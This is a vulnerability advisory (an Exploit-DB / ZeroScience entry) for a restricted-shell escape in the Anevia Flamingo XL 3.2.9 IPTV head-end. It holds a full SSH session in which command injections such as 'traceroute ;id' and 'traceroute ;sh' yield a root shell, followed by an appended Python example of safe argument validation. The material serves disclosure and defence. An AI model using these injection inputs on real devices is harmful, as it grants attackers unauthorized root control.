Anevia Flamingo XL 3.2.9 – Remote Root Jailbreak

  • Author: LiquidWorm
    Date: 2023-06-14
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51516/
  • Exploit Title: Anevia Flamingo XL 3.2.9 - Remote Root Jailbreak
    Exploit Author: LiquidWorm
    Product web page: https://www.ateme.com
    Affected version: 3.2.9
    Hardware revision 1.0
    SoapLive 2.0.3
    
    Summary: Flamingo XL, a new modular and high-density IPTV head-end
    product for hospitality and corporate markets. Flamingo XL captures
    live TV and radio content from satellite, cable, digital terrestrial
    and analog sources before streaming it over IP networks to STBs, PCs
    or other IP-connected devices. The Flamingo XL is based upon a modular
    4U rack hardware platform that allows hospitality and corporate video
    service providers to deliver a mix of channels from various sources
    over internal IP networks.
    
    Desc: Once the admin establishes a secure shell session, she gets
    dropped into a sandboxed environment using the login binary, which
    allows only a specific set of commands. One of those commands,
    traceroute, can be exploited to escape the jailed shell. A remote
    attacker can break out of the restricted environment and gain full
    root access to the device.
    
    Tested on: GNU/Linux 3.1.4 (x86_64)
     Apache/2.2.15 (Unix)
     mod_ssl/2.2.15
     OpenSSL/0.9.8g
     DAV/2
     PHP/5.3.6
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    @zeroscience
    
    
    Advisory ID: ZSL-2023-5780
    Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5780.php
    
    
    13.04.2023
    
    --
    
    
    $ ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 root@192.168.1.1
    The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.
    RSA key fingerprint is SHA256:E6TaDYkszZMbS555THYEPVzv1DpzYrwJzW1TM4+ZSLk.
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '192.168.1.1' (RSA) to the list of known hosts.
    Anevia Flamingo XL
    root@192.168.1.1's password:
    Primary-XL> help
    available commands:
    bonding
    config
    date
    dns
    enable
    ethconfig
    exit
    exp
    firewall
    help
    hostname
    http
    igmpq
    imp
    ipconfig
    license
    log
    mail
    passwd
    persistent_logs
    ping
    reboot
    reset
    route
    serial
    settings
    sslconfig
    tcpdump
    timezone
    traceroute
    upgrade
    uptime
    version
    vlanconfig
    
    Primary-XL> tcpdump ;id
    tcpdump: illegal token: ;
    Primary-XL> id
    unknown command id
    Primary-XL> whoami
    unknown command whoami
    Primary-XL> ping ;id
    ping: ;id: Host name lookup failure
    Primary-XL> traceroute ;id
    BusyBox v1.1.2p2 (2012.04.24-09:33+0000) multi-call binary
    
    Usage: traceroute [-FIldnrv] [-f 1st_ttl] [-m max_ttl] [-p port#] [-q nqueries]
    [-s src_addr] [-t tos] [-w wait] [-g gateway] [-i iface]
    [-z pausemsecs] host [data size]
    
    trace the route ip packets follow going to "host"
    Options:
    -F            Set the don't fragment bit
    -I            Use ICMP ECHO instead of UDP datagrams
    -l            Display the ttl value of the returned packet
    -d            Set SO_DEBUG options to socket
    -n            Print hop addresses numerically rather than symbolically
    -r            Bypass the normal routing tables and send directly to a host
    -v            Verbose output
    -m max_ttl    Set the max time-to-live (max number of hops)
    -p port#      Set the base UDP port number used in probes
                  (default is 33434)
    -q nqueries   Set the number of probes per ``ttl'' to nqueries
                  (default is 3)
    -s src_addr   Use the following IP address as the source address
    -t tos        Set the type-of-service in probe packets to the following value
                  (default 0)
    -w wait       Set the time (in seconds) to wait for a response to a probe
                  (default 3 sec)
    -g            Specify a loose source route gateway (8 maximum)
    
    uid=0(root) gid=0(root) groups=0(root)
    Primary-XL> version
    Software Revision: Anevia Flamingo XL v3.2.9
    Hardware Revision: 1.0
    (c) Anevia 2003-2012
    Primary-XL> traceroute ;sh
    ...
    ...
    whoami
    root
    id
    uid=0(root) gid=0(root) groups=0(root)
    ls -al
    drwxr-xr-x  19 root root  1024 Oct  3  2022 .
    drwxr-xr-x  19 root root  1024 Oct  3  2022 ..
    drwxr-xr-x   2 root root  1024 Oct 21  2013 bin
    drwxrwxrwt   2 root root    40 Oct  3  2022 cores
    drwxr-xr-x  13 root root 27648 May 22 00:53 dev
    drwxr-xr-x   3 root root  1024 Oct 21  2013 emul
    drwxr-xr-x  48 1000 1000  3072 Oct  3  2022 etc
    drwxr-xr-x   3 root root  1024 Oct  3  2022 home
    drwxr-xr-x  11 root root  3072 Oct 21  2013 lib
    lrwxrwxrwx   1 root root    20 Oct 21  2013 lib32 -> /emul/ia32-linux/lib
    lrwxrwxrwx   1 root root     3 Oct 21  2013 lib64 -> lib
    drwx------   2 root root 12288 Oct 21  2013 lost+found
    drwxr-xr-x   4 root root  1024 Oct 21  2013 mnt
    drwxrwxrwt   2 root root    80 May 22 00:45 php_sessions
    dr-xr-xr-x 177 root root     0 Oct  3  2022 proc
    drwxr-xr-x   4 root root  1024 Oct 21  2013 root
    drwxr-xr-x   2 root root  2048 Oct 21  2013 sbin
    drwxr-xr-x  12 root root     0 Oct  3  2022 sys
    drwxrwxrwt  26 root root  1140 May 22 01:06 tmp
    drwxr-xr-x  10 1000 1000  1024 Oct 21  2013 usr
    drwxr-xr-x  14 root root  1024 Oct 21  2013 var
    
    ls /var/www/admin
    _img                 configuration.php                 log_securemedia.php   stream_dump.php
    _lang                cores_and_logs_management.php     login.php             stream_services
    _lib                 dataminer_handshake.php           logout.php            streaming.php
    _style               dvbt.php                          logs.php              support.php
    about.php            dvbt_scan.php                     main.php              template
    ajax                 export.php                        manager.php           time.php
    alarm.php            fileprogress.php                  network.php           toto.ts
    alarm_view.php       firewall.php                      pear                  upload_helper.php
    authentication.php   get_config                        power.php             uptime.php
    bridges.php          get_enquiry_pending.php           read_settings.php     usbloader.php
    cam.php              get_upgrade_error.php             receive_helper.php    version.php
    channel.php          heartbeat.php                     rescrambling          webradio.php
    channel_xl_list.php  include                           rescrambling.php      webtv
    check_state          input.php                         resilience            webtv.php
    class                js                                resilience.php        xmltv.php
    common               license.php                       restart_service.php
    config_snmp.php      log.php                           set_oem.php
    
    python -c 'import pty; pty.spawn("/bin/bash")'
    root@Primary-XL:/# cd /usr/local/bin
    root@Primary-XL:/usr/local/bin# ls -al login
    -rwxr-xr-x 1 root root 35896 Feb 21  2012 login
    root@Primary-XL:/usr/local/bin# cd ..
    root@Primary-XL:/usr/local# ls commands/
    bonding          firewall   mail             timezone
    config           help       passwd           traceroute
    date             hostname   persistent_logs  upgrade
    dbg-serial       http       ping             uptime
    dbg-set-oem      igmpq      route            version
    dbg-updates-log  imp        serial           vlanconfig
    dns              ipconfig   settings
    ethconfig        license    sslconfig
    exp              log        tcpdump
    root@Primary-XL:/usr/local# exit
    exit
    Primary-XL> enable
    password:
    Primary-XL# ;]
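The escape in the session above works because the jail passes the raw traceroute argument string to a shell, so `;sh` is parsed as a second command. As an added example that is not part of the advisory or the vendor's code, the Python below shows how such a command dispatcher should handle the argument: validate it as a single host, then run the tool as an argv list with no shell, refusing `;sh` the same way the page's tcpdump command refuses `;`. The binary paths, the `-n` flag and the error wording are assumptions for illustration.

```python
import ipaddress
import os
import re
import subprocess

# Hostname per RFC 1123 label rules; a leading "-" or any shell
# metacharacter (";", "|", "$", backtick, ...) fails this pattern.
HOSTNAME_RE = re.compile(
    r"^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?"
    r"(\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)*$", re.IGNORECASE)


def is_valid_target(target):
    """Accept only a literal IP address or a syntactically valid hostname."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        return len(target) <= 253 and HOSTNAME_RE.match(target) is not None


def build_argv(binary, rest):
    """Turn the operator's argument string into an argv list for execve.
    Exactly one token is allowed and it must be a host; anything else is
    refused with the same 'illegal token' wording the page's tcpdump uses."""
    tokens = rest.split()
    if len(tokens) != 1:
        raise ValueError("usage: %s <host>" % os.path.basename(binary))
    if not is_valid_target(tokens[0]):
        raise ValueError("illegal token: %s" % tokens[0])
    return [binary, "-n", tokens[0]]   # -n: numeric output, no DNS lookups


# Allow-list of jail commands; binary paths are assumed, not from the device.
COMMANDS = {
    "traceroute": lambda rest: build_argv("/usr/bin/traceroute", rest),
    "ping": lambda rest: build_argv("/bin/ping", rest),
}


def dispatch(line, execute=False):
    """Handle one jail-shell input line. Returns an error message string, or
    the argv list that is run (when execute=True) without any shell."""
    parts = line.strip().split(None, 1)
    if not parts:
        return ""
    cmd, rest = parts[0], (parts[1] if len(parts) > 1 else "")
    handler = COMMANDS.get(cmd)
    if handler is None:
        return "unknown command %s" % cmd
    try:
        argv = handler(rest)
    except ValueError as err:
        return "%s: %s" % (cmd, err)
    if execute:
        # argv list + shell=False: ";" is an ordinary byte, never a separator
        subprocess.run(argv, shell=False, check=False)
    return argv
```

Note that ping here rejects `;id` up front instead of attempting a host lookup on it, which is the behaviour the page's ping command shows.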